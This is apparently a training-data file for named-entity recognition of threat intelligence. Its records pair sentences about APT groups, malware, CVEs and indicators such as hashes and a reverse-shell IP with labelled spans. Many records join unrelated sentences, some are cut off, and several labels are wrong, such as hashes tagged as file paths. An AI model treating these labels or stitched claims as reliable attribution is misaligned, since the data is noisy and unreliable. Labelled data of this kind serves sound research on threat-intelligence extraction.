APT38 's operations began in February 2014 and were likely influenced by financial sanctions enacted in March 2013 that blocked bulk cash transfers and restricted North Korea 's access to international banking systems .", "spans": {"THREAT_ACTOR: group": [[109, 114]], "ORGANIZATION: military": [[197, 205]], "ORGANIZATION: organizations": [[206, 219]], "THREAT_ACTOR: APT38": [[222, 227]]}, "info": {"id": "cyberner_stix_train_001177", "source": "cyberner_stix_train"}} {"text": "Based on the public blog post – which also indicated that FireEye is responding to an intrusion at a second facility featuring the same or similar observations – this is presumably not for lack of evidence , yet the “ downgrade ” occurs all the same .", "spans": {"ORGANIZATION: FireEye": [[58, 65]]}, "info": {"id": "cyberner_stix_train_001178", "source": "cyberner_stix_train"}} {"text": "The abuse of the WebSocket protocol provides XLoader with a persistent connection between clients and servers where data can be transported any time . To make the fraudulent withdrawals , Lazarus first breaches targeted banks' networks and compromises the switch application servers handling ATM transactions . This may indicate the campaign is still ongoing .", "spans": {"MALWARE: XLoader": [[45, 52]], "THREAT_ACTOR: Lazarus": [[188, 195]], "ORGANIZATION: banks'": [[220, 226]]}, "info": {"id": "cyberner_stix_train_001179", "source": "cyberner_stix_train"}} {"text": "The final step in the trojan 's initialization is the escalation and maintenance of privileges in the device . ITG08 is an organized cybercrime gang that has been active since 2015 , mostly targeting pointof-sale (POS) machines in brick-and-mortar retailers and companies in the hospitality sector in the U.S. and Europe . 
ScarCruft is a relatively new APT group , victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania .", "spans": {"THREAT_ACTOR: ITG08": [[111, 116]], "ORGANIZATION: retailers": [[248, 257]], "ORGANIZATION: hospitality sector": [[279, 297]], "THREAT_ACTOR: ScarCruft": [[323, 332]]}, "info": {"id": "cyberner_stix_train_001180", "source": "cyberner_stix_train"}} {"text": "This brought to us the hypothesis that this might be a version used by the group behind ViceLeaker for internal communication or for other , unclear purposes . We confirmed that this is a DarkHydrus Group's new attack targeting Middle East region . The ScarCruft has shown itself to be a highly-skilled and active group .", "spans": {"MALWARE: ViceLeaker": [[88, 98]], "THREAT_ACTOR: DarkHydrus": [[188, 198]], "THREAT_ACTOR: ScarCruft": [[253, 262]]}, "info": {"id": "cyberner_stix_train_001181", "source": "cyberner_stix_train"}} {"text": "ORat is the name assigned by the malware author , as denoted by the program debug database string in the analyzed sample : D:\\vswork\\Plugin\\ORat\\build\\Release\\ORatServer\\Loader.pdb .", "spans": {"MALWARE: ORat": [[0, 4]]}, "info": {"id": "cyberner_stix_train_001182", "source": "cyberner_stix_train"}} {"text": "In May 2017 , APT37 used a bank liquidation letter as a spear phishing lure against a board member of a Middle Eastern financial company . 
The spear phishing emails used in the known attacks by the Callisto Group were so convincing that even skilled and alert users would likely have attempted to open the malicious attachment .", "spans": {"THREAT_ACTOR: APT37": [[14, 19]], "ORGANIZATION: board member": [[86, 98]], "ORGANIZATION: financial company": [[119, 136]], "TOOL: emails": [[158, 164]], "THREAT_ACTOR: Callisto Group": [[198, 212]]}, "info": {"id": "cyberner_stix_train_001183", "source": "cyberner_stix_train"}} {"text": "Palo Alto Networks has noted and described the differences of two malware agents developed in parallel , with commonalities in behavior but differing functionalities ; families described as Infy and Infy M. Our primary observation was of the Infy ( non-M ) malware , which primarily functions as a keylogger for the collection of account credentials . As explained later , we believe this campaign is financially-motivated and that it targets accounting departments in Russian businesses .", "spans": {"ORGANIZATION: Palo Alto Networks": [[0, 18]], "TOOL: Infy": [[190, 194], [242, 246]], "TOOL: Infy M.": [[199, 206]], "TOOL: malware": [[257, 264]], "TOOL: keylogger": [[298, 307]], "ORGANIZATION: accounting departments": [[443, 465]], "ORGANIZATION: businesses": [[477, 487]]}, "info": {"id": "cyberner_stix_train_001184", "source": "cyberner_stix_train"}} {"text": "It uses different topics that include the unique device identifier , which side is sending the message , and whether it is information message or command . From mid-2016 through early 2017 , APT33 compromised a U.S. organization in the aerospace sector and targeted a business conglomerate located in Saudi Arabia with aviation holdings . They most likely used the Qt Creator IDE in a Windows . 
The email address admin@93[.]gd is linked to IP addresses owned by a certain user with the nickname “ PIG GOD”—another", "spans": {"THREAT_ACTOR: APT33": [[191, 196]], "ORGANIZATION: organization": [[216, 228]], "ORGANIZATION: aerospace sector": [[236, 252]], "ORGANIZATION: business conglomerate": [[268, 289]], "TOOL: Qt Creator IDE": [[365, 379]], "SYSTEM: Windows": [[385, 392]]}, "info": {"id": "cyberner_stix_train_001185", "source": "cyberner_stix_train"}} {"text": "Reverse shell payload The payload is started by the main module with a specified host and port as a parameter that is hardcoded to ‘ 54.67.109.199 ’ and ‘ 30010 ’ in some versions : Alternatively , they could be hardcoded directly into the payload code : We also observed variants that were equipped with similar reverse shell payloads directly in the main APK /lib/ path . The group was first revealed and named by SkyEye Team in May 2015 . The group has targeted healthcare , defense , aerospace , and government sectors , and has targeted Japanese victims since at least 2014 .", "spans": {"THREAT_ACTOR: group": [[378, 383]]}, "info": {"id": "cyberner_stix_train_001186", "source": "cyberner_stix_train"}} {"text": "The extracted executable file contains a compiled Autoit script , which can be seen in the RT_RCDATA section of the file .", "spans": {"TOOL: Autoit": [[50, 56]]}, "info": {"id": "cyberner_stix_train_001187", "source": "cyberner_stix_train"}} {"text": "This could indicate that actor already has plans in expanding the targets to applications from different countries and regions . Most interestingly , Rapid7 observed the use of the Notepad++ updater gup.exe as a legitimate executable to sideload a malicious DLL (libcurl.dll) in order to deploy a variant of the UPPERCUT backdoor also known as ANEL . 
An overview of the connections among these threats is discussed in below .", "spans": {"ORGANIZATION: Rapid7": [[150, 156]], "MALWARE: gup.exe": [[199, 206]], "MALWARE: ANEL": [[344, 348]]}, "info": {"id": "cyberner_stix_train_001188", "source": "cyberner_stix_train"}} {"text": "The final payload ( dd03c6eb62c9bf9adaf831f1d7adcbab ) is implanted manually as in the WFCWallet case .", "spans": {"FILEPATH: dd03c6eb62c9bf9adaf831f1d7adcbab": [[20, 52]], "TOOL: WFCWallet": [[87, 96]]}, "info": {"id": "cyberner_stix_train_001189", "source": "cyberner_stix_train"}} {"text": "I hope that by uncovering this malware at such an early stage , we will be able to prevent a massive and dangerous attack when the attackers are ready to actively use their methods . In the case of Octopus , DustSquad used Delphi as their programming language of choice , which is unusual for such an actor . These operators , like soldiers , may merely be following orders given to them by others . Its code identifies the victim ’s browser and then serves one of two exploits .", "spans": {"TOOL: Octopus": [[198, 205]]}, "info": {"id": "cyberner_stix_train_001190", "source": "cyberner_stix_train"}} {"text": "We were able to discover this particular version by diving further into connections to analytics-google.org .", "spans": {"IP_ADDRESS: analytics-google.org": [[87, 107]]}, "info": {"id": "cyberner_stix_train_001191", "source": "cyberner_stix_train"}} {"text": "The opcode instructions generated by this custom VM are divided into different categories : Logical opcodes , which implement bit-logic operators ( OR , AND , NOT , XOR ) and mathematical operators Conditional branching opcodes , which implement a code branch based on conditions ( equals to JC , JE , JZ , other similar branching opcodes ) Load/Store opcodes , which write to or read from particular addresses of the virtual address space of the process Specialized opcodes for various purposes , Our evidence suggests that malware authors created 
Emissary as early as 2009 , which suggests that threat actors have relied on this tool as a payload in cyber-espionage attacks for many years . However , there is a downside of using such a technique : once the scheme is uncovered , the attacker loses control and computers can be cleaned through regular updates . What ’s more , two other vulnerabilities in MOVEit were found while new victims were still coming forward .", "spans": {"TOOL: Emissary": [[549, 557]], "THREAT_ACTOR: threat actors": [[597, 610]], "TOOL: MOVEit": [[908, 914]]}, "info": {"id": "cyberner_stix_train_001192", "source": "cyberner_stix_train"}} {"text": "Next , the loader checks that it ’ s not running in a virtualized environment ( VMWare or Hyper-V ) or under a debugger . Evidence also suggests that APT32 has targeted network security and technology infrastructure corporations with connections to foreign investors . ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4 Malware/Backdoor 659 KB ( 674 , 816 bytes ) PE32 executable for MS Windows ( DLL ) ( console ) Intel 80386 32-bit September 2018 . Getting access to the C2 information helped the researchers get a clear view of the attacker 's operations and utilities .", "spans": {"SYSTEM: VMWare": [[80, 86]], "SYSTEM: Hyper-V": [[90, 97]], "THREAT_ACTOR: APT32": [[150, 155]], "ORGANIZATION: network security": [[169, 185]], "ORGANIZATION: technology infrastructure corporations": [[190, 228]], "FILEPATH: ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4": [[269, 333]], "SYSTEM: Windows": [[401, 408]], "TOOL: DLL": [[411, 414]], "ORGANIZATION: Intel": [[429, 434]], "SYSTEM: C2": [[487, 489]]}, "info": {"id": "cyberner_stix_train_001193", "source": "cyberner_stix_train"}} {"text": "The threat actor Rocke was originally revealed by Talos in August of 2018 and many remarkable behaviors were disclosed in their blog post . 
Wild Neutron hit the spotlight in 2013 , when it successfully infected companies such as Apple , Facebook , Twitter and Microsoft .", "spans": {"ORGANIZATION: Talos": [[50, 55]], "ORGANIZATION: Apple": [[229, 234]], "ORGANIZATION: Facebook": [[237, 245]], "ORGANIZATION: Twitter": [[248, 255]], "ORGANIZATION: Microsoft": [[260, 269]]}, "info": {"id": "cyberner_stix_train_001195", "source": "cyberner_stix_train"}} {"text": "Secureworks Counter Threat Unit ( CTU ) researchers have observed BRONZE PRESIDENT activity since mid-2018 but identified artifacts suggesting that the threat actors may have been conducting network intrusions as far back as 2014 .", "spans": {"ORGANIZATION: Secureworks Counter Threat Unit": [[0, 31]], "ORGANIZATION: CTU": [[34, 37]], "THREAT_ACTOR: BRONZE PRESIDENT": [[66, 82]]}, "info": {"id": "cyberner_stix_train_001196", "source": "cyberner_stix_train"}} {"text": "The original app looks innocent , with most of its code aimed at implementing the real features that the app claims to provide . Based on incident response investigations , product detections , and intelligence observations along with additional publications on the same operators , FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests . Word Dropper Variant cc5a14ff026ee593d7d25f213715b73833e6b9cf71091317121a009d5ad7fc36 7ce3d9fc86396fac9865607594395e94 Word Dropper Variant 28a8d6b8a0cdcb25d098e403cc8b6dcb855cb591f0b54c2e3363b5c580d92b28 74c7aed44680100e984251ce2cdbdbc6 Word Dropper Variant facbc2cb089668197ca3968a3433b6f4826430c13f7d1c75b44667307c67dfe3 10f308d78adda567d4589803ce18cc9b Word Dropper Variant e714a5147335245c386b105bb7494a8b190b6a737ba28f029561efe48105cd11 f279d0f04874327b85221697d99de321 Word Dropper Variant 56c46ef3d5bd544fa35f6e336d3be93cf36e72d0273fa1dbc915979f2d883e9d bc1b322e7efc19417ab0d0524ccb9ff2 . 
Mandiant has observed overlap amongst multiple North Korean groups that fall under the RGB .", "spans": {"THREAT_ACTOR: operators": [[271, 280]], "ORGANIZATION: FireEye": [[283, 290]], "THREAT_ACTOR: APT32": [[305, 310]], "THREAT_ACTOR: cyber espionage group": [[316, 337]], "MALWARE: Word Dropper": [[385, 397], [504, 516], [623, 635], [742, 754], [861, 873]], "FILEPATH: cc5a14ff026ee593d7d25f213715b73833e6b9cf71091317121a009d5ad7fc36": [[406, 470]], "FILEPATH: 7ce3d9fc86396fac9865607594395e94": [[471, 503]], "FILEPATH: 28a8d6b8a0cdcb25d098e403cc8b6dcb855cb591f0b54c2e3363b5c580d92b28": [[525, 589]], "FILEPATH: 74c7aed44680100e984251ce2cdbdbc6": [[590, 622]], "FILEPATH: facbc2cb089668197ca3968a3433b6f4826430c13f7d1c75b44667307c67dfe3": [[644, 708]], "FILEPATH: 10f308d78adda567d4589803ce18cc9b": [[709, 741]], "FILEPATH: e714a5147335245c386b105bb7494a8b190b6a737ba28f029561efe48105cd11": [[763, 827]], "FILEPATH: f279d0f04874327b85221697d99de321": [[828, 860]], "FILEPATH: 56c46ef3d5bd544fa35f6e336d3be93cf36e72d0273fa1dbc915979f2d883e9d": [[882, 946]], "FILEPATH: bc1b322e7efc19417ab0d0524ccb9ff2": [[947, 979]]}, "info": {"id": "cyberner_stix_train_001197", "source": "cyberner_stix_train"}} {"text": "Yet our statistics says that about 60 % of Android users are still sitting with Android 4.4.2 and below . The zero-day vulnerability found and reported by Symantec (CVE-2019-0703) occurs due to the way the Windows SMB Server handles certain requests . 
The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 .", "spans": {"SYSTEM: Android": [[43, 50]], "SYSTEM: Android 4.4.2 and below": [[80, 103]], "ORGANIZATION: Symantec": [[155, 163]], "VULNERABILITY: (CVE-2019-0703)": [[164, 179]], "FILEPATH: .rtf file": [[295, 304]], "VULNERABILITY: CVE-2017-0199": [[320, 333]]}, "info": {"id": "cyberner_stix_train_001198", "source": "cyberner_stix_train"}} {"text": "C&C : The command and control channel that serves to relay commands between the installed malware and attackers .", "spans": {"TOOL: C&C": [[0, 3]], "TOOL: command and control": [[10, 29]]}, "info": {"id": "cyberner_stix_train_001199", "source": "cyberner_stix_train"}} {"text": "In some samples , starting from January 2016 , an algorithm has been implemented for unpacking the encrypted executable DEX file from the assets folder . Some of the documents exploited CVE-2017-0199 to deliver the payload . Trend Micro endpoint solutions such as Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security can protect users and businesses from these threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs .", "spans": {"MALWARE: documents": [[166, 175]], "VULNERABILITY: CVE-2017-0199": [[186, 199]], "ORGANIZATION: Trend Micro": [[225, 236]], "ORGANIZATION: Trend Micro™ Smart Protection Suites": [[264, 300]], "ORGANIZATION: Worry-Free™ Business Security": [[305, 334]], "ORGANIZATION: businesses": [[357, 367]], "FILEPATH: malicious files": [[400, 415]]}, "info": {"id": "cyberner_stix_train_001200", "source": "cyberner_stix_train"}} {"text": "Once BARIUM has established rapport , they spear-phish the victim using a variety of unsophisticated malware installation vectors , including malicious shortcut ( .lnk ) files with hidden payloads , compiled HTML help ( .chm ) files , or Microsoft Office documents containing macros or exploits .", "spans": {"THREAT_ACTOR: BARIUM": [[5, 11]], "TOOL: 
malicious shortcut": [[142, 160]], "FILEPATH: .lnk": [[163, 167]], "TOOL: compiled HTML": [[199, 212]], "FILEPATH: .chm": [[220, 224]], "TOOL: Microsoft Office documents": [[238, 264]]}, "info": {"id": "cyberner_stix_train_001201", "source": "cyberner_stix_train"}} {"text": "The Lookout Threat Intelligence team identified that this same Facebook profile has also posted Google Drive links to Android malware belonging to the FrozenCell family attributed to APT-C-27 . This recent attack against an online casino in Central America suggests that hacking tools from the Lazarus toolset are recompiled with every attack ( we didn't see these exact samples anywhere else ) . In this case, the Trustwave Secure email Gateway flagged the message as suspicious and it did not get . Based on our research , we discovered an unknown threat actor using MortalKombat ransomware since December 2022 to target individuals and smaller companies .", "spans": {"ORGANIZATION: Lookout Threat Intelligence": [[4, 31]], "ORGANIZATION: Facebook": [[63, 71]], "SYSTEM: Google Drive": [[96, 108]], "SYSTEM: Android": [[118, 125]], "MALWARE: FrozenCell": [[151, 161]], "THREAT_ACTOR: Lazarus": [[294, 301]], "TOOL: email": [[432, 437]], "ORGANIZATION: individuals and smaller companies": [[623, 656]]}, "info": {"id": "cyberner_stix_train_001202", "source": "cyberner_stix_train"}} {"text": "The second function is http : //s.psserviceonline [ . BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . 
We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[54, 67]], "VULNERABILITY: zero-day vulnerability": [[123, 145]], "MALWARE: Powermud backdoor": [[334, 351]], "MALWARE: Backdoor.Powemuddy": [[371, 389]], "MALWARE: custom tools": [[398, 410]], "SYSTEM: Windows": [[511, 518]], "FILEPATH: makecab.exe": [[543, 554]]}, "info": {"id": "cyberner_stix_train_001203", "source": "cyberner_stix_train"}} {"text": "These accounts are created by abusing accessibility services . By analyzing the attack infrastructure , Group-IB identified that MoneyTaker group continuously exfiltrates internal banking documentation to learn about bank operations in preparation for future attacks . Foreword ” . In March 2021 , in a separate environment , we observed a threat actor utilize one or more vulnerabilities to place at least one web shell on the vulnerable Exchange Server .", "spans": {"ORGANIZATION: Group-IB": [[104, 112]], "THREAT_ACTOR: MoneyTaker group": [[129, 145]], "ORGANIZATION: bank": [[217, 221]], "SYSTEM: a separate environment": [[301, 323]], "THREAT_ACTOR: a threat actor": [[338, 352]], "VULNERABILITY: the vulnerable Exchange Server": [[424, 454]]}, "info": {"id": "cyberner_stix_train_001204", "source": "cyberner_stix_train"}} {"text": "Get installed applications GET_CONTACTS Get contacts SEND_BULK_SMS Send SMS to multiple numbers UPDATE_APK Not implemented INJECT_PACKAGE Add new overlay target CALL_FORWARD Enable/disable call forwarding START_PERMISSIONS Starts request for additional permissions ( Accessibility privileges , battery optimizations bypass , dynamic permissions ) Features The most recent version of Ginp has the same capabilities as most other Android banking Trojans , 
such as the use of overlay attacks , SMS control and contact In all three incidents , APT10 gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials . Symantec reported that Tick exploited additional Adobe Flash and Microsoft Office vulnerabilities .", "spans": {"SYSTEM: Android": [[428, 435]], "THREAT_ACTOR: APT10": [[540, 545]], "TOOL: Citrix": [[595, 601]], "TOOL: LogMeIn": [[606, 613]], "ORGANIZATION: Symantec": [[675, 683]], "THREAT_ACTOR: Tick": [[698, 702]], "TOOL: Adobe Flash": [[724, 735]], "TOOL: Microsoft Office": [[740, 756]], "VULNERABILITY: vulnerabilities": [[757, 772]]}, "info": {"id": "cyberner_stix_train_001205", "source": "cyberner_stix_train"}} {"text": "Once installed on a device FrozenCell is capable of : Recording calls Retrieving generic phone metadata ( e.g. , cell location , mobile country code , mobile network code ) Geolocating a device Extracting SMS messages Retrieving a victim 's accounts Exfiltrating images Downloading and installing additional applications Searching for and exfiltrating pdf , doc , docx , ppt , pptx , xls , and xlsx file types Retrieving contacts The graph below represents a split of the types of data The fact that the cybercriminals behind GozNym have already adapted the Trojan for three different languages and in countries which have different banking systems is unique , according to Kessem . APT1 . Threat actors have been using this business model for a decade - plus , originally known as commodity malware .", "spans": {"MALWARE: FrozenCell": [[27, 37]], "TOOL: GozNym": [[526, 532]], "ORGANIZATION: Kessem": [[674, 680]], "THREAT_ACTOR: APT1": [[683, 687]], "THREAT_ACTOR: Threat actors": [[690, 703]], "MALWARE: commodity malware": [[782, 799]]}, "info": {"id": "cyberner_stix_train_001206", "source": "cyberner_stix_train"}} {"text": "Busybox payload Busybox is public software that provides several Linux tools in a single ELF file . 
The attackers have targeted a large number of organizations globally since early 2017 . Heightened activity was seen in mid-2015 .", "spans": {"THREAT_ACTOR: attackers": [[104, 113]]}, "info": {"id": "cyberner_stix_train_001207", "source": "cyberner_stix_train"}} {"text": "However , in addition to the traditional functionality , there were also backdoor capabilities such as upload , download , delete files , camera takeover and record surrounding audio . A previous campaign of this APT group was uncovered by Talos in June 2017 , and since then very little of this operation was seen in the wild . When uploading stolen data to a cloud service , it uses predefined directory path such as /english , /video or /scriptout .", "spans": {"ORGANIZATION: Talos": [[240, 245]]}, "info": {"id": "cyberner_stix_train_001208", "source": "cyberner_stix_train"}} {"text": "CN Tel . However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised . Victims of BlackOasis have been observed in the following countries : Russia , Iraq , Afghanistan , Nigeria , Libya , Jordan , Tunisia , Saudi Arabia , Iran , Netherlands , Bahrain , United Kingdom and Angola .", "spans": {"THREAT_ACTOR: APT20": [[45, 50]], "VULNERABILITY: zero-day exploits": [[59, 76]], "THREAT_ACTOR: BlackOasis": [[147, 157]]}, "info": {"id": "cyberner_stix_train_001209", "source": "cyberner_stix_train"}} {"text": "Comparison of code of Asset file before and after decryption Figure 11 . APT15 was also observed using Mimikatz to dump credentials and generate Kerberos golden tickets . The image file has been correctly identified by SEG as a PNG when its file extension is .jpg denoting a JPEG formatted . 
None on the CrowdStrike Falcon ® console and of the market - leading CrowdStrike Falcon ® platform in action .", "spans": {"THREAT_ACTOR: APT15": [[73, 78]], "TOOL: Mimikatz": [[103, 111]], "FILEPATH: .jpg": [[259, 263]], "TOOL: CrowdStrike Falcon": [[304, 322], [361, 379]]}, "info": {"id": "cyberner_stix_train_001210", "source": "cyberner_stix_train"}} {"text": "Once they have access to the network , they steal the organization's legitimate SSL certificate and use it on actor-controlled servers . We suspect this router was hacked as part of the campaign in order to process the malware 's HTTP requests .", "spans": {"THREAT_ACTOR: they": [[39, 43]], "TOOL: actor-controlled": [[110, 126]], "TOOL: servers": [[127, 134]], "MALWARE: router": [[153, 159]]}, "info": {"id": "cyberner_stix_train_001211", "source": "cyberner_stix_train"}} {"text": "Possible impacts include : temporary or permanent loss of sensitive or proprietary information , disruption to regular operations , financial losses incurred to restore systems and files , and potential harm to an organization 's reputation .", "spans": {}, "info": {"id": "cyberner_stix_train_001212", "source": "cyberner_stix_train"}} {"text": "We confirmed that the tool did not expose vulnerabilities in the management technology itself , but rather misused AMT SOL within target networks that have already been compromised to keep communication stealthy and evade security applications . From late April to early May , the attackers focused on human rights related NGOs .", "spans": {"ORGANIZATION: NGOs": [[323, 327]]}, "info": {"id": "cyberner_stix_train_001213", "source": "cyberner_stix_train"}} {"text": "Conclusion Smishing ( SMS phishing ) offers a unique vector to infect mobile users . Based on previously observed tactics , it is highly likely the OilRig group leveraged credential harvesting and compromised accounts to use the government agency as a launching platform for their true attacks . 
The decoded base64 data is an AutoIT binary . Instead , it appeared that corresponding requests were made directly through the Outlook Web Application ( OWA ) endpoint , indicating a previously undisclosed exploit method for Exchange .", "spans": {"THREAT_ACTOR: OilRig group": [[148, 160]], "TOOL: credential harvesting": [[171, 192]], "TOOL: compromised accounts": [[197, 217]], "ORGANIZATION: government agency": [[229, 246]], "TOOL: AutoIT": [[326, 332]], "TOOL: Outlook Web Application ( OWA ) endpoint": [[423, 463]], "TOOL: Exchange": [[521, 529]]}, "info": {"id": "cyberner_stix_train_001214", "source": "cyberner_stix_train"}} {"text": "TA459 is well-known for targeting organizations in Russia and neighboring countries .", "spans": {"THREAT_ACTOR: TA459": [[0, 5]]}, "info": {"id": "cyberner_stix_train_001215", "source": "cyberner_stix_train"}} {"text": "The spear-phishing emails used by the Dukes may contain either specially-crafted malicious attachments or links to URLs hosting the malware .", "spans": {"TOOL: emails": [[19, 25]], "THREAT_ACTOR: Dukes": [[38, 43]]}, "info": {"id": "cyberner_stix_train_001216", "source": "cyberner_stix_train"}} {"text": "The app then clicks the appropriate buttons , scrollbars , and other UI elements to go through account sign-up without user intervention . At this point , the current attack campaign against the chemical industry began . FireEye Threat Intelligence assesses that APT17 , a China based threat group , was behind the attempt . 
The track controlling commands issued may have also resulted in tram collisions , a further risk to those on board and nearby the areas of impact .", "spans": {"ORGANIZATION: chemical industry": [[195, 212]], "ORGANIZATION: FireEye": [[221, 228]], "THREAT_ACTOR: APT17": [[263, 268]]}, "info": {"id": "cyberner_stix_train_001217", "source": "cyberner_stix_train"}} {"text": "BRONZE PRESIDENT has deployed a variety of remote access tools .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[0, 16]]}, "info": {"id": "cyberner_stix_train_001218", "source": "cyberner_stix_train"}} {"text": "If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs . Just like last time , Buhtrap is spreading through exploits embedded in news outlets .", "spans": {"MALWARE: bot": [[5, 8]], "ORGANIZATION: news outlets": [[221, 233]]}, "info": {"id": "cyberner_stix_train_001219", "source": "cyberner_stix_train"}} {"text": "It then sends the aggregated log back to the C2 server .", "spans": {"TOOL: C2": [[45, 47]]}, "info": {"id": "cyberner_stix_train_001220", "source": "cyberner_stix_train"}} {"text": "EVENTBOT VERSION 0.3.0.1 Additional Assets Based on Country / Region EventBot-23aEventBot Spanish and Italian Images in Spanish and Italian added in version 0.3.0.1 . We assume that RunPow stands for run PowerShell , ” and triggers the PowerShell code embedded inside the .dll file . 
Once connected to the VPN , APT35 focused on stealing domain credentials from a Microsoft Active Directory Domain Controller to allow them to authenticate to the single-factor VPN and Office 365 instance .", "spans": {"MALWARE: PowerShell": [[204, 214]], "MALWARE: .dll file": [[272, 281]], "TOOL: VPN": [[306, 309], [460, 463]], "THREAT_ACTOR: APT35": [[312, 317]], "ORGANIZATION: Microsoft": [[364, 373]]}, "info": {"id": "cyberner_stix_train_001221", "source": "cyberner_stix_train"}} {"text": "There are a ton of functions that are clearly decoding information from arrays after which it executes an already decoded PowerShell command .", "spans": {"TOOL: PowerShell": [[122, 132]]}, "info": {"id": "cyberner_stix_train_001222", "source": "cyberner_stix_train"}} {"text": "The latest version is analyzed here ; we weren ’ t able to determine if the earlier versions were also malicious . During this attack , we found that the SLUB malware used two Slack teams sales-yww9809” and marketing-pwx7789 . The first class , colloquially known as \" wipers \" , are a class of malware has the primary intent of destroying data on a victim 's machine .", "spans": {"THREAT_ACTOR: SLUB": [[154, 158]], "MALWARE: wipers": [[269, 275]]}, "info": {"id": "cyberner_stix_train_001223", "source": "cyberner_stix_train"}} {"text": "] 31 162.243.172 [ . In the 2018 public posting announcing TEMP.Veles , FireEye researchers noted that the institute in question at least supported TEMP.Veles activity in deploying TRITON . 
In our analysis , we reviewed the TTPs and the decoy content , and pointed out the similarities between previous attacks that have been attributed to MoleRATs , an Arabic-speaking , politically motivated group that has operated The email address admin@93[.]gd is linked to IP addresses owned by a certain user with the nickname “ PIG GOD”—another", "spans": {"THREAT_ACTOR: TEMP.Veles": [[59, 69], [148, 158]], "ORGANIZATION: FireEye": [[72, 79]], "TOOL: TRITON": [[181, 187]], "THREAT_ACTOR: MoleRATs": [[340, 348]], "ORGANIZATION: “ PIG GOD”—another": [[518, 536]]}, "info": {"id": "cyberner_stix_train_001224", "source": "cyberner_stix_train"}} {"text": "However , we did find a single shared IP address demonstrably connecting the Downeks downloader and Quasar C2 infrastructure .", "spans": {"MALWARE: Downeks": [[77, 84]], "MALWARE: Quasar": [[100, 106]], "TOOL: C2": [[107, 109]]}, "info": {"id": "cyberner_stix_train_001225", "source": "cyberner_stix_train"}} {"text": "Kaspersky products detect the above-described threat with the verdict Trojan-Banker.AndroidOS.Riltok . Trend Micro has previously reported the use of this malware in targeted attacks by the BlackTech group , primarily focused on cyber-espionage in Asia . An interesting element is that the malware looks for filenames created with the previous version of KONNI .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "ORGANIZATION: Trend Micro": [[103, 114]], "THREAT_ACTOR: BlackTech": [[190, 199]], "MALWARE: KONNI": [[355, 360]]}, "info": {"id": "cyberner_stix_train_001226", "source": "cyberner_stix_train"}} {"text": "It has similar functionality to the ‘ AndroidMDMSupport ’ command from the current versions – stealing data belonging to other installed applications . Operation Parliament appears to be another symptom of escalating tensions in the Middle East region . 
Winnti Group is a threat group with Chinese origins that has been active since at least 2010 .", "spans": {"THREAT_ACTOR: Operation Parliament": [[152, 172]], "THREAT_ACTOR: Winnti Group": [[254, 266]]}, "info": {"id": "cyberner_stix_train_001227", "source": "cyberner_stix_train"}} {"text": "Upon conclusion of our investigation , we shared this information with the manufacturers of the specific devices involved and they have used this event to explore new protections in their products .", "spans": {}, "info": {"id": "cyberner_stix_train_001228", "source": "cyberner_stix_train"}} {"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx” . Xagent” is the original filename Xagent.exe whereas seems to be the version of the worm .", "spans": {"MALWARE: document": [[34, 42]], "VULNERABILITY: Trump's_Attack_on_Syria_English.docx”": [[49, 86]], "FILEPATH: Xagent”": [[89, 96]], "FILEPATH: Xagent.exe": [[122, 132]], "FILEPATH: worm": [[172, 176]]}, "info": {"id": "cyberner_stix_train_001229", "source": "cyberner_stix_train"}} {"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . 
While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July .", "spans": {"ORGANIZATION: security firm": [[17, 30]], "ORGANIZATION: military officials": [[63, 81]], "VULNERABILITY: Adobe Reader vulnerability": [[153, 179]], "VULNERABILITY: CVE-2014-0515": [[271, 284]], "TOOL: Adobe Flash": [[285, 296]], "VULNERABILITY: exploit": [[297, 304]], "ORGANIZATION: Cisco TRAC": [[323, 333]]}, "info": {"id": "cyberner_stix_train_001230", "source": "cyberner_stix_train"}} {"text": "The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that – when enabled – leads to the download of Hancitor . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including embassies .", "spans": {"MALWARE: Hancitor": [[149, 157]], "MALWARE: Epic Turla": [[181, 191]], "ORGANIZATION: embassies": [[270, 279]]}, "info": {"id": "cyberner_stix_train_001231", "source": "cyberner_stix_train"}} {"text": "While recent Zebrocy versioning was 7.1 , some of the related Zebrocy modules that drop file-stealing MSIL modules we call Covfacy were v7.0 .", "spans": {"MALWARE: Zebrocy": [[13, 20], [62, 69]], "TOOL: MSIL": [[102, 106]], "TOOL: Covfacy": [[123, 130]]}, "info": {"id": "cyberner_stix_train_001232", "source": "cyberner_stix_train"}} {"text": "Triada : organized crime on Android 2 . CVE-2017-0143 was also used by two other exploit tools—EternalRomance and EternalSynergy—that were released as part of the Shadow Brokers leak in April 2017 . 
